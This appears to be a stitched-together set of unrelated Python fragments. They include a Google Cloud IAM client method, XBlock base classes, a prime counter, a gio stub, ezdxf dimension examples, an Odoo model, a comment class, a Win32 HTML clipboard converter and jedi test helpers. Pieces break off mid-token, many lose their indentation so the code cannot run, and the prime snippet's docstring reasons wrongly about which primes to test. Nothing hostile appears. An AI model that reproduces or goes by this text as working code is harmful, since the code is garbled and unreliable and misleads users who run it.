return grafeas_v1.GrafeasClient(grafeas_transport)
# Service calls
    def set_iam_policy(
        self,
        resource,
        policy,
        retry=google.api_core.gapic_v1.method.DEFAULT,
        timeout=google.api_core.gapic_v1.method.DEFAULT,
        metadata=None,
    ):
        """
        Sets the access control policy on the specified note or occurrence.
        Requires ``containeranalysis.notes.setIamPolicy`` or
        ``containeranalysis.occurrences.setIamPolicy`` permission if the
        resource is a note or an occurrence, respectively.

        The resource takes the format ``projects/[PROJECT_ID]/notes/[NOTE_ID]``
        for notes and ``projects/[PROJECT_ID]/occurrences/[OCCURRENCE_ID]`` for
        occurrences.

        Example:
            >>> from google.cloud.devtools import containeranalysis_v1
            >>>
            >>> client = containeranalysis_v1.ContainerAnalysisClient()
            >>>
            >>> resource = client.note_path('[PROJECT]', '[NOTE]')
            >>>
            >>> # TODO: Initialize `policy`:
            >>> policy = {}
            >>>
            >>> response = client.set_iam_policy(resource, policy)

        Args:
            resource (str): REQUIRED: The resource for which the policy is being specified.
                See the operation documentation for the appropriate value for this field.
            policy (Union[dict, ~google.cloud.devtools.containeranalysis_v1.types.Policy]): REQUIRED: The complete policy to be applied to the ``resource``. The
                size of the policy is limited to a few 10s of KB. An empty policy is a
                valid policy but certain Cloud Platform services (such as Projects)
                might reject them.
                If a dict is provided, it must be of the same form as the protobuf
                message :class:`~google.cloud.devtools.containeranalysis_v1.types.Policy`
            retry (Optional[google.api_core.retry.Retry]): A retry object used
                to retry requests. If ``None`` is specified, requests will
                be retried using a default configuration.
            timeout (Optional[float]): The amount of time, in seconds, to wait
                for the request to complete. Note that if ``retry`` is
                specified, the timeout applies to each individual attempt.
            metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
                that is provided to the method.

        Returns:
            A :class:`~google.cloud.devtools.containeranalysis_v1.types.Policy` instance.

        Raises:
            google.api_core.exceptions.GoogleAPICallError: If the request
                failed for any reason.
            google.api_core.exceptions.RetryError: If the request failed due
                to a retryable error and retry attempts failed.
            ValueError: If the parameters are invalid.
        """
        # Wrap the transport method to add retry and timeout logic.
        # The wrapped callable is cached in self._inner_api_calls so the
        # wrapping cost is paid only on the first call.
        if "set_iam_policy" not in self._inner_api_calls:
            self._inner_api_calls[
                "set_iam_policy"
            ] = google.api_core.gapic_v1.method.wrap_method(
                self.transport.set_iam_policy,
                default_retry=self._method_configs["SetIamPolicy"].retry,
                default_timeout=self._method_configs["SetIamPolicy"].timeout,
                client_info=self._client_info,
            )
        request = iam_policy_pb2.SetIamPolicyRequest(resource=resource, policy=policy)
        if metadata is None:
            metadata = []
        metadata = list(metadata)
        # Attach a gRPC routing header derived from the resource name.
        # NOTE(review): generated boilerplate — the AttributeError guard is
        # emitted by the code generator; the list literal itself cannot raise.
        try:
            routing_header = [("resource", resource)]
        except AttributeError:
            pass
        else:
            routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
                routing_header
            )
            metadata.append(routing_metadata)
        return self._inner_api_calls["set_iam_policy"](
            request, retry=retry, timeout=timeout, metadata=metadata
        )
def get_i |
rt xblock.mixins
from xblock.mixins import (
ScopedStorageMixin,
HierarchyMixin,
RuntimeServicesMixin,
HandlersMixin,
XmlSerializationMixin,
IndexInfoMixin,
ViewsMixin,
)
from xblock.plugin import Plugin
from xblock.validation import Validation
# exposing XML_NAMESPACES as a member of core, in order to avoid importing mixins where
# XML_NAMESPACES are needed (e.g. runtime.py).
XML_NAMESPACES = xblock.mixins.XML_NAMESPACES
# __all__ controls what classes end up in the docs.
__all__ = ['XBlock']
UNSET = object()
class XBlockMixin(ScopedStorageMixin):
    """
    Base class for XBlock Mixin classes.

    XBlockMixin classes can add new fields and new properties to all XBlocks
    created by a particular runtime.
    """
class SharedBlockBase(Plugin):
    """
    Behaviors and attrs which all XBlock like things should share
    """

    @classmethod
    def open_local_resource(cls, uri):
        """Open a local resource.

        The container calls this method when it receives a request for a
        resource on a URL which was generated by Runtime.local_resource_url().
        It will pass the URI from the original call to local_resource_url()
        back to this method. The XBlock must parse this URI and return an open
        file-like object for the resource.

        For security reasons, the default implementation will return only a
        very restricted set of file types, which must be located in a folder
        called "public". XBlock authors who want to override this behavior will
        need to take care to ensure that the method only serves legitimate
        public resources. At the least, the URI should be matched against a
        whitelist regex to ensure that you do not serve an unauthorized
        resource.
        """
        # Whitelist check: the URI must live under public/ ...
        if not uri.startswith("public/"):
            raise DisallowedFileError("Only files from public/ are allowed: %r" % uri)
        # ... and no path component may begin with a dot, which rejects both
        # ".." traversal and hidden files.
        if "/." in uri:
            raise DisallowedFileError("Only safe file names are allowed: %r" % uri)
        return pkg_resources.resource_stream(cls.__module__, uri)
# -- Base Block
class XBlock(XmlSerializationMixin, HierarchyMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin,
             IndexInfoMixin, ViewsMixin, SharedBlockBase):
    """Base class for XBlocks.

    Derive from this class to create a new kind of XBlock.  There are no
    required methods, but you will probably need at least one view.

    Don't provide the ``__init__`` method when deriving from this class.
    """
    entry_point = 'xblock.v1'
    # Scoped settings fields shared by every XBlock.
    name = String(help="Short name for the block", scope=Scope.settings)
    tags = List(help="Tags for this block", scope=Scope.settings)
    @class_lazy
    def _class_tags(cls):  # pylint: disable=no-self-argument
        """
        Collect the tags from all base classes.
        """
        class_tags = set()
        # Walk the MRO (excluding this class itself) and union the tags.
        for base in cls.mro()[1:]:  # pylint: disable=no-member
            class_tags.update(getattr(base, '_class_tags', set()))
        return class_tags
    @staticmethod
    def tag(tags):
        """Returns a function that adds the words in `tags` as class tags to this class."""
        def dec(cls):
            """Add the words in `tags` as class tags to this class."""
            # Add in this class's tags; commas and whitespace both separate tags.
            cls._class_tags.update(tags.replace(",", " ").split())  # pylint: disable=protected-access
            return cls
        return dec
    @classmethod
    def load_tagged_classes(cls, tag, fail_silently=True):
        """
        Produce a sequence of all XBlock classes tagged with `tag`.

        fail_silently causes the code to simply log warnings if a
        plugin cannot import. The goal is to be able to use part of
        libraries from an XBlock (and thus have it installed), even if
        the overall XBlock cannot be used (e.g. depends on Django in a
        non-Django application). There is disagreement about whether
        this is a good idea, or whether we should see failures early
        (e.g. on startup or first page load), and in what
        contexts. Hence, the flag.
        """
        # Allow this method to access the `_class_tags`
        # pylint: disable=W0212
        for name, class_ in cls.load_classes(fail_silently):
            if tag in class_._class_tags:
                yield name, class_
    def __init__(self, runtime, field_data=None, scope_ids=UNSET, *args, **kwargs):
        """
        Construct a new XBlock.

        This class should only be instantiated by runtimes.

        Arguments:
            runtime (:class:`.Runtime`): Use it to access the environment.
                It is available in XBlock code as ``self.runtime``.
            field_data (:class:`.FieldData`): Interface used by the XBlock
                fields to access their data from wherever it is persisted.
                Deprecated.
            scope_ids (:class:`.ScopeIds`): Identifiers needed to resolve
                scopes.
        """
        # scope_ids is keyword-optional only for signature compatibility; the
        # UNSET sentinel lets us distinguish "omitted" from an explicit None.
        if scope_ids is UNSET:
            raise TypeError('scope_ids are required')
        # Provide backwards compatibility for external access through _field_data
        super(XBlock, self).__init__(runtime=runtime, scope_ids=scope_ids, field_data=field_data, *args, **kwargs)
    def render(self, view, context=None):
        """Render `view` with this block's runtime and the supplied `context`"""
        return self.runtime.render(self, view, context)
    def validate(self):
        """
        Ask this xblock to validate itself. Subclasses are expected to override this
        method, as there is currently only a no-op implementation. Any overriding method
        should call super to collect validation results from its superclasses, and then
        add any additional results as necessary.
        """
        return Validation(self.scope_ids.usage_id)
class XBlockAside(XmlSerializationMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin, SharedBlockBase):
"""
This mixin allows Xblock-like class to declare that it provides aside functionality.
"""
entry_point = "xblock_asides.v1"
@classmethod
def aside_for(cls, view_name):
"""
A decorator to indicate a function is the aside view for the given view_name.
Aside views should have a signature like:
@XBlockAside.aside_for('student_view')
def student_aside(self, block, context=None):
...
return Fragment(...)
"""
# pylint: disable=protected-access
def _decorator(func): # pylint: disable=missing-docstring
if not hasattr(func, '_aside_for'):
func._aside_for = []
func._aside_for.append(view_name) # pylint: disable=protected-access
return func
return _decorator
@class_lazy
def _combined_asides(cls): # pylint: disable=no-self-argument
"""
A dictionary mapping XBlock view names to the aside method that
decorates them (or None, if there is no decorator for the specified view).
"""
# The method declares what views it decorates. We rely on `dir`
# to handle subclasses and overrides.
combined_asides = defaultdict(None)
for _view_name, view_func in inspect.getmembers(cls, lambda attr: hasattr(attr, '_aside_for')):
aside_for = getattr(view_func, '_aside_for', [])
for view in aside_for:
combined_asides[view] = view_func.__name__
return combined_asides
def aside_view_declaration(self, view_name):
"""
Find and return a function object if one is an aside_view for the given view_name
Aside methods declare their view provision via @XBlockAside.aside_for(view_name)
This function finds those declarations for a block.
Arguments:
view_name (string): the name of the view requested.
|
"""
For any given number, we only need to test the primes below it.
e.g. 9 -- we need only test 1,2,3,5,7
e.g. 8 -- we need only test 1,2,3,5,7
for example, the number 12 has factors 1,2,3 | ,6,12.
We could find the six factor but we will find the two factor first.
The definition of a composite number is that it is composed of primes, therefore it will always have a prime as a factor.
This prime test should have an index of all primes below i.
"""
total_range = 1000000
primes = list()
def prime_test(i):
"""
Cases:
Return False if i is not prime
Return True if | i is prime
Caveat: cannot test 1.
Caveat 2: Cannot test 2.
It is fortuitous that these tests both return true.
"""
for possible_factor in primes:
if i % possible_factor == 0:
return False
return True
for prime in range(2,total_range):
is_prime = prime_test(prime)
if is_prime:
primes.append(prime)
print len(primes)
|
# encoding: utf-8
# module gio._gio
# from /usr/lib/python2.7/dist-packages/gtk-2.0/gio/_gio.so
# by generator 1.135
# no doc
# imports
import gio as __gio
import glib as __glib
import gobject as __gobject
import gobject._gobject as __gobject__gobject
class FileMonitorEvent(__gobject.GEnum):
    """Auto-generated introspection stub for gio's ``GFileMonitorEvent`` enum.

    NOTE(review): produced by a stub generator for IDE use; the real
    implementation lives in the compiled ``_gio`` extension — do not edit
    the values by hand.
    """
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    __weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    """list of weak references to the object (if defined)"""
    __dict__ = None # (!) real value is '' -- placeholder; actual value only exists in the extension module
    # Enum members 0..7; the generator emits them as a plain int mapping.
    __enum_values__ = {
        0: 0,
        1: 1,
        2: 2,
        3: 3,
        4: 4,
        5: 5,
        6: 6,
        7: 7,
    }
    __gtype__ = None # (!) real value is '' -- placeholder for the GObject type
|
ert += (0.2, 0)
attribs = dict(TEXT_ATTRIBS)
line_space = 0.4
delta = Vec3(0, line_space, 0)
for line in lines:
text = msp.add_text(line, dxfattribs=attribs).set_pos(insert)
if ucs:
text.transform(ucs.matrix)
insert -= delta
msp = doc.modelspace()
setup_dimstyle(
doc,
name="TICK",
fmt="EZ_M_100_H25_CM",
style=DIM_TEXT_STYLE,
)
setup_dimstyle(
doc,
name="ARCHTICK",
fmt="EZ_M_100_H25_CM",
blk=ezdxf.ARROWS.architectural_tick,
style=DIM_TEXT_STYLE,
)
setup_dimstyle(
doc,
name="CLOSEDBLANK",
fmt="EZ_M_100_H25_CM",
blk=ezdxf.ARROWS.closed_blank,
style=DIM_TEXT_STYLE,
)
    def text(dimstyle, x, y, halign, valign, oblique=0):
        """Default dimension text placing

        Renders four linear dimensions (wide, narrow, arrows-inside, and
        text forced inside) at the given position to showcase one text
        alignment combination.

        NOTE(review): relies on ``msp``, ``ucs``, ``BRICSCAD`` and
        ``add_text`` from the enclosing scope.

        Args:
            dimstyle: dimstyle to use
            x: start point x
            y: start point y
            halign: horizontal text alignment - "left", "right", "center",
                "above1", "above2", requires DXF R2000+
            valign: vertical text alignment "above", "center", "below"
            oblique: angle of oblique extension line, 0 = orthogonal to
                dimension line
        """
        dimattr = {}
        if oblique:
            dimattr["oblique_angle"] = oblique
        # All four dimensions share the same base (dimension line) height.
        base = (x, y + 2)
        # wide
        dim = msp.add_linear_dim(
            base=base,
            p1=(x, y),
            p2=(x + 5, y),
            dimstyle=dimstyle,
            dxfattribs=dimattr,
        )
        dim.set_text_align(halign=halign, valign=valign)
        dim.render(ucs=ucs, discard=BRICSCAD)
        # Label the group with the alignment parameters used.
        add_text(
            [f"halign={halign}", f"valign={valign}", f"oblique={oblique}"],
            insert=Vec3(x, y),
        )
        # narrow
        dim = msp.add_linear_dim(
            base=base,
            p1=(x + 7, y),
            p2=(x + 7.3, y),
            dimstyle=dimstyle,
            dxfattribs=dimattr,
        )
        dim.set_text_align(halign=halign, valign=valign)
        dim.render(ucs=ucs, discard=BRICSCAD)
        # arrows inside, text outside
        dim = msp.add_linear_dim(
            base=base,
            p1=(x + 10, y),
            p2=(x + 10.9999, y),
            dimstyle=dimstyle,
            override={"dimdec": 2},
            dxfattribs=dimattr,
        )
        dim.set_text_align(halign=halign, valign=valign)
        dim.render(ucs=ucs, discard=BRICSCAD)
        # narrow and force text inside
        dim = msp.add_linear_dim(
            base=base,
            p1=(x + 14, y),
            p2=(x + 14.3, y),
            dimstyle=dimstyle,
            override={"dimtix": 1},
            dxfattribs=dimattr,
        )
        dim.set_text_align(halign=halign, valign=valign)
        dim.render(ucs=ucs, discard=BRICSCAD)
    def user_text_free(dimstyle, x=0, y=0, leader=False):
        """User defined dimension text placing.

        Demonstrates absolute placement, relative placement, and two text
        shifts for user-positioned dimension text.

        NOTE(review): relies on ``msp``, ``ucs``, ``BRICSCAD`` and
        ``add_text`` from the enclosing scope.

        Args:
            dimstyle: dimstyle to use
            x: start point x
            y: start point y
            leader: use leader line if True
        """
        override = {
            "dimdle": 0.0,
            "dimexe": 0.5,  # length of extension line above dimension line
            "dimexo": 0.5,  # extension line offset
            "dimtfill": 2,  # custom text fill
            "dimtfillclr": 4,  # cyan
        }
        base = (x, y + 2)
        # Absolute user-defined text location.
        dim = msp.add_linear_dim(
            base=base,
            p1=(x, y),
            p2=(x + 3, y),
            dimstyle=dimstyle,
            override=override,
        )
        location = Vec3(x + 3, y + 3, 0)
        dim.set_location(location, leader=leader)
        dim.render(ucs=ucs, discard=BRICSCAD)
        add_text(
            [f"usr absolute={location}", f"leader={leader}"], insert=Vec3(x, y)
        )
        x += 4
        # Text location relative to the dimension line center.
        dim = msp.add_linear_dim(
            base=base,
            p1=(x, y),
            p2=(x + 3, y),
            dimstyle=dimstyle,
            override=override,
        )
        relative = Vec3(-1, +1)  # relative to dimline center
        dim.set_location(relative, leader=leader, relative=True)
        dim.render(ucs=ucs, discard=BRICSCAD)
        add_text(
            [f"usr relative={relative}", f"leader={leader}"], insert=Vec3(x, y)
        )
        x += 4
        # Shift the text away from its default location.
        dim = msp.add_linear_dim(
            base=base,
            p1=(x, y),
            p2=(x + 3, y),
            dimstyle=dimstyle,
            override=override,
        )
        dh = -0.7
        dv = 1.5
        dim.shift_text(dh, dv)
        dim.render(ucs=ucs, discard=BRICSCAD)
        add_text(
            [
                f"shift text=({dh}, {dv})",
            ],
            insert=Vec3(x, y),
        )
        # Narrow case: shift while forcing the text inside.
        override["dimtix"] = 1  # force text inside
        x += 4
        dim = msp.add_linear_dim(
            base=base,
            p1=(x, y),
            p2=(x + 0.3, y),
            dimstyle=dimstyle,
            override=override,
        )
        dh = 0
        dv = 1
        dim.shift_text(dh, dv)
        dim.render(ucs=ucs, discard=BRICSCAD)
        add_text(
            [
                f"shift text=({dh}, {dv})",
            ],
            insert=Vec3(x, y),
        )
dimstyles = ["TICK", "ARCHTICK", "CLOSEDBLANK"]
xoffset = 17
yoffset = 5
for col, dimstyle in enumerate(dimstyles):
row = 0
for halign in ("center", "left", "right"):
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign=halign,
valign="above",
)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign=halign,
valign="center",
)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign=halign,
valign="below",
)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign="above1",
valign="above",
)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign="above2",
valign="above",
)
row += 1
user_text_free(dimstyle, x=col * xoffset, y=row * yoffset)
row += 1
user_text_free(dimstyle, x=col * xoffset, y=row * yoffset, leader=True)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign="center",
valign="above",
oblique=70,
)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * | yoffset,
halign="above1",
valign="above",
oblique=80,
)
row += 1
doc.saveas(OUTDIR / filename)
def example_multi_point_linear_dimension():
    """Example for using the ezdxf "multi-point linear dimension" feature, which
    generates dimension entities for multiple points at ones and tries to move
    dimension text to a readable location.

    This feature works best with DXF R2007+.
    """
    doc = ezdxf.new("R2007", setup=True)
    msp = doc.modelspace()
    points = [(0, 0), (5, 1), (5.2, 1), (5.4, 0), (7, 0), (10, 3)]
    msp.add_lwpolyline(points)
    # Duplicate the EZDXF dimstyle once instead of overriding DIMSTYLE
    # attributes on every dimension call.
    filled_style = cast(
        DimStyle, doc.dimstyles.duplicate_entry("EZDXF", "WITHTFILL")
    )
    filled_style.dxf.dimtfill = 1
    msp.add_multi_point_linear_dim(
        base=(0, 5), points=points, dimstyle="WITHTFILL"
    )
    doc.saveas(OUTDIR / f"multi_point_linear_dim_R2007.dxf")
def random_point(start, end):
    """Return a random Vec3 whose x and y both lie in [start, end)."""
    span = end - start
    x = start + random.random() * span
    y = start + random.random() * span
    return Vec3(x, y)
def example_random_multi_point_linear_dimension(
count=10, length=20, dis |
# -*- coding | : utf-8 -*-
from openerp import models, fields, api
class StockPicking(models.Model):
    # Extend the core stock.picking model with a delivery-location field.
    _inherit = 'stock.picking'
    # Free-form text shown on the picking as "Deliver at".
    deliver = fields.Char(string="Deliver at")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Module containing methods for comment preprocessing (cleaning) """
class Comment(object):
    """
    Comment Entity.

    Wraps a raw comment string together with author metadata and
    gender-split like counters, and offers simple preprocessing helpers.
    """

    def __init__(self, comment_string):
        self._comment = comment_string
        self._author = None
        self._gender = None
        self._male_likes = 0
        self._female_likes = 0

    @property
    def comment(self):
        """The (possibly preprocessed) comment text."""
        return self._comment

    @comment.setter
    def comment(self, value):
        self._comment = value

    @property
    def author(self):
        """Author of the comment (None until assigned)."""
        return self._author

    @author.setter
    def author(self, value):
        self._author = value

    @property
    def gender(self):
        """Author gender label (None until assigned)."""
        return self._gender

    @gender.setter
    def gender(self, value):
        self._gender = value

    @property
    def male_likes(self):
        """Number of likes received from male users."""
        return self._male_likes

    @male_likes.setter
    def male_likes(self, value):
        self._male_likes = value

    @property
    def female_likes(self):
        """Number of likes received from female users."""
        return self._female_likes

    @female_likes.setter
    def female_likes(self, value):
        self._female_likes = value

    @property
    def likes(self):
        """Returns the calculated sum of male and female likes"""
        return self._male_likes + self._female_likes

    @property
    def likes_ratio(self):
        """Fraction of all likes contributed by male users (0.0 if unliked)."""
        total = self.likes
        return float(self._male_likes) / float(total) if total > 0 else 0.0

    def __str__(self):
        return str(self._comment)

    def lower_comment(self):
        """Normalize the comment text to lower case in place."""
        self._comment = self._comment.lower()
|
ion.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
The Win32 clipboard uses a special format for handling HTML. The basic
problem that the special format is trying to solve is that the user can
select an arbitrary chunk of formatted text that might not be valid HTML.
For instance selecting half-way through a bolded word would contain no </b>
tag. The solution is to encase the fragment in a valid HTML document.
You can read more about this at:
http://msdn.microsoft.com/workshop/networking/clipboard/htmlclipboard.asp
This module deals with converting between the clipboard HTML format and
standard HTML format.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
import logging
import re
# ----------------------------------------------------------------------------
# Private Functions
# ----------------------------------------------------------------------------
def _findFirst( pattern, src ):
"""
A helper function that simplifies the logic of using regex to find
the first match in a string.
"""
results = re.findall( pattern, src )
if len(results) > 0:
return results[0]
return None
# ----------------------------------------------------------------------------
# HtmlClipboardFormat Object
# ----------------------------------------------------------------------------
class HtmlClipboardFormat:
"""
Encapsulates the conversation between the clipboard HTML
format and standard HTML format.
"""
# The 1.0 HTML clipboard header format.
HEADER_FORMAT = \
"Version:1.0\r\n" \
"StartHTML:%(htmlStart)09d\r\n" \
"EndHTML:%(htmlEnd)09d\r\n" \
"StartFragment:%(fragmentStart)09d\r\n" \
"EndFragment:%(fragmentEnd)09d\r\n" \
"StartSelection:%(fragmentStart)09d\r\n" \
"EndSelection:%(fragmentEnd)09d\r\n" \
"SourceURL:Enso\r\n"
# A generic HTML page.
HTML_PAGE = \
"<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n" \
"<html>\n<head><title></title></head>\n" \
"<body>%s</body>\n" \
"</html>"
# These regexps find the character offsets of the fragment strings (see
# below) from the HTML clipboard format header.
START_RE = "StartFragment:(\d+)"
END_RE = "EndFragment:(\d+)"
# The Clipboard HTML format uses the following comment strings to mark
# the beginning and end of the text fragment which represents the user's
# actual s | election; everything else is envelope.
START_FRAG = "<!-- StartFragment -->"
END_FRAG = "<!-- EndFragment -->"
    def __init__( self, html ):
        """
        Initializes the class to represent html.
        """
        # Preconditions:
        # NOTE(review): ``unicode`` makes this module Python-2-only.
        assert( type( html ) == unicode )
        # The internal storage format is platonic unicode.
        self.html = html
@classmethod
def fromClipboardHtml( cls, clipboardHtml ):
"""
Instantiates the class given a string containing the Win32 Html
Clipboard format. The given clipboardHtml is expected to be in
utf-8 and is expected to contain the special start-fragment and
end-fragment markers as defined in the class constants. If it's
not utf-8 or if it doesn't have the right delimiters, this function
logs a warning message and creates an instance empty of text.
"""
# Preconditions:
assert( type( clipboardHtml ) == str )
try:
html = clipboardHtml.decode( "utf-8" )
except UnicodeDecodeError:
# input can't be decoded from utf-8:
logging.warn( "Non-Utf-8 string in fromClipboardHtml." )
return cls( u"" )
start = _findFirst( cls.START_RE, clipboardHtml )
end = _findFirst( cls.END_RE, clipboardHtml )
if start and end:
html = clipboardHtml[ int(start): int(end) ]
html = html.decode( "utf-8" )
return cls( html )
else:
# Start and end not found in input:
logging.warn( "Missing delimiters in fromClipboardHtml." )
return cls( u"" )
    @classmethod
    def fromHtml( cls, html ):
        """
        Instantiates the class given a string containing plain Html.
        """
        # Preconditions:
        # NOTE(review): requires platonic unicode input (Python-2-only check).
        assert( isinstance( html, unicode ) )
        return cls( html )
    def toClipboardHtml( self ):
        """
        Returns the contents in the Win32 Html format.
        The result is a UTF-8 encoded byte string with the clipboard header.
        """
        return self._encodeHtmlFragment( self.html )
    def toHtml( self ):
        """
        Returns the contents in the plain Html format (as unicode).
        """
        return self.html
def _createHtmlPage( self, fragment ):
"""
Takes an Html fragment and encloses it in a full Html page.
"""
return self.HTML_PAGE % fragment
def _encodeHtmlFragment(self, sourceHtml):
"""
Join all our bits of information into a string formatted as per the
clipboard HTML format spec.
The return value of this function is a Python string
encoded in UTF-8.
"""
# Preconditions:
assert( type( sourceHtml ) == unicode )
# LONGTERM TODO: The above contract statement involving
# .encode().decode() could have damaging performance
# repercussions.
# NOTE: Every time we construct a string, we must encode it to
# UTF-8 *before* we do any position-sensitive operations on
# it, such as taking its length or finding a substring
# position.
if "<body>" in sourceHtml:
htmlheader, fragment = sourceHtml.split( "<body>" )
fragment, footer = fragment.split( "</body>" )
htmlheader = htmlheader + "<body>"
footer = "</body>" + footer
fragment = "".join( [self.START_FRAG,
fragment,
self.END_FRAG] )
html = "".join([ htmlheader, fragment, footer ])
else:
fragment = sourceHtml
html = self._createHtmlPage( fragment )
fragment = fragment.encode( "utf-8" )
html = html.encode( "utf-8" )
assert html == html.decode( "utf-8" ).encode( "utf-8" ), \
"Encoding got out of whack in HtmlClipboardFormat."
# How long is the header going to be?
dummyHeader = self.HEADER_FORMAT % dict( htmlStart = 0,
htmlEnd = 0,
fragmentStart = 0,
fragmentEnd = 0 )
dummyHeader = dummyHeader.encode( "utf-8" )
headerLen = len(dummyHeader)
fragmentStart = html.find( fragment )
fragmentEnd = fragmentStart + len( fragment )
positions = dict( htmlStart = headerLen,
htmlEnd = headerLen + len(html),
fragmentStart = headerLen + fragmentStart,
fragmentEnd = headerLen + fragmentEnd )
|
Usages
++++++
Tests look like this::
abc = 1
#< abc@1,0 abc@3,0
abc
"""
import os
import re
import sys
import operator
from ast import literal_eval
from io import StringIO
from functools import reduce
import jedi
from jedi._compatibility import unicode, is_py3
from jedi.parser import Parser, load_grammar
from jedi.api.classes import Definition
# Tags for the four kinds of integration test a test file can declare;
# IntegrationTestCase.run dispatches on these.
TEST_COMPLETIONS = 0
TEST_DEFINITIONS = 1
TEST_ASSIGNMENTS = 2
TEST_USAGES = 3
class IntegrationTestCase(object):
    """One test extracted from a test file, plus everything needed to run it.

    ``test_type`` is one of the TEST_* constants; ``correct`` is the raw
    expected-result string taken from the test comment; ``line_nr``/``column``
    locate the position the test operates on; ``start`` is the offset of the
    test comment within its line; ``line`` is the commented source line.
    """
    def __init__(self, test_type, correct, line_nr, column, start, line,
                 path=None, skip=None):
        self.test_type = test_type
        self.correct = correct
        self.line_nr = line_nr
        self.column = column
        self.start = start
        self.line = line
        self.path = path
        self.skip = skip
    @property
    def module_name(self):
        # File name without directory or extension.
        return os.path.splitext(os.path.basename(self.path))[0]
    @property
    def line_nr_test(self):
        """The test is always defined on the line before."""
        return self.line_nr - 1
    def __repr__(self):
        return '<%s: %s:%s:%s>' % (self.__class__.__name__, self.module_name,
                                   self.line_nr_test, self.line.rstrip())
    def script(self):
        # Build a jedi Script positioned at the spot this test targets.
        # NOTE(review): self.source is assigned externally (by the collector),
        # not in __init__.
        return jedi.Script(self.source, self.line_nr, self.column, self.path)
    def run(self, compare_cb):
        # Dispatch on test type; every runner calls compare_cb(self, actual, expected).
        testers = {
            TEST_COMPLETIONS: self.run_completion,
            TEST_DEFINITIONS: self.run_goto_definitions,
            TEST_ASSIGNMENTS: self.run_goto_assignments,
            TEST_USAGES: self.run_usages,
        }
        return testers[self.test_type](compare_cb)
    def run_completion(self, compare_cb):
        completions = self.script().completions()
        #import cProfile; cProfile.run('script.completions()')
        comp_str = set([c.name for c in completions])
        # ``correct`` holds a literal list of the expected completion names.
        return compare_cb(self, comp_str, set(literal_eval(self.correct)))
    def run_goto_definitions(self, compare_cb):
        script = self.script()
        evaluator = script._evaluator
        def comparison(definition):
            # Instances are rendered with trailing parentheses.
            suffix = '()' if definition.type == 'instance' else ''
            return definition.desc_with_module + suffix
        def definition(correct, correct_start, path):
            # Evaluate each whitespace-separated expression in ``correct``
            # in the scope of the test line to build the expected set.
            should_be = set()
            for match in re.finditer('(?:[^ ]+)', correct):
                string = match.group(0)
                parser = Parser(load_grammar(), string, start_symbol='eval_input')
                parser.position_modifier.line = self.line_nr
                element = parser.get_parsed_node()
                element.parent = jedi.api.completion.get_user_scope(
                    script._get_module(),
                    (self.line_nr, self.column)
                )
                results = evaluator.eval_element(element)
                if not results:
                    raise Exception('Could not resolve %s on line %s'
                                    % (match.string, self.line_nr - 1))
                should_be |= set(Definition(evaluator, r) for r in results)
            # Because the objects have different ids, `repr`, then compare.
            should = set(comparison(r) for r in should_be)
            return should
        should = definition(self.correct, self.start, script.path)
        result = script.goto_definitions()
        is_str = set(comparison(r) for r in result)
        return compare_cb(self, is_str, should)
    def run_goto_assignments(self, compare_cb):
        result = self.script().goto_assignments()
        # Compared as the string form of the sorted descriptions.
        comp_str = str(sorted(str(r.description) for r in result))
        return compare_cb(self, comp_str, self.correct)
    def run_usages(self, compare_cb):
        result = self.script().usages()
        self.correct = self.correct.strip()
        compare = sorted((r.module_name, r.line, r.column) for r in result)
        wanted = []
        if not self.correct:
            positions = []
        else:
            positions = literal_eval(self.correct)
        for pos_tup in positions:
            if type(pos_tup[0]) == str:
                # this means that there is a module specified
                wanted.append(pos_tup)
            else:
                # Line numbers in the test are relative to the test line.
                line = pos_tup[0]
                if pos_tup[0] is not None:
                    line += self.line_nr
                wanted.append((self.module_name, line, pos_tup[1]))
        return compare_cb(self, compare, sorted(wanted))
def skip_python_version(line):
    """Return a skip reason when *line* demands a Python version we lack.

    A test file may contain a comment such as ``# python >= 3.3``.  When the
    running interpreter does not satisfy the comparison, the textual skip
    reason is returned; otherwise (or when the line carries no version
    requirement) None is returned.
    """
    # Map each comparison literal to its function in ``operator``.
    # Fix: '<' previously pointed at the nonexistent operator.gk (raising
    # AttributeError) and '>' at operator.lt (inverted comparison).
    comp_map = {
        '==': 'eq',
        '<=': 'le',
        '>=': 'ge',
        '<': 'lt',
        '>': 'gt',
    }
    # check for python minimal version number
    match = re.match(r" *# *python *([<>]=?|==) *(\d+(?:\.\d+)?)$", line)
    if match:
        minimal_python_version = tuple(
            map(int, match.group(2).split(".")))
        operation = getattr(operator, comp_map[match.group(1)])
        if not operation(sys.version_info, minimal_python_version):
            return "Minimal python version %s %s" % (match.group(1), match.group(2))
    return None
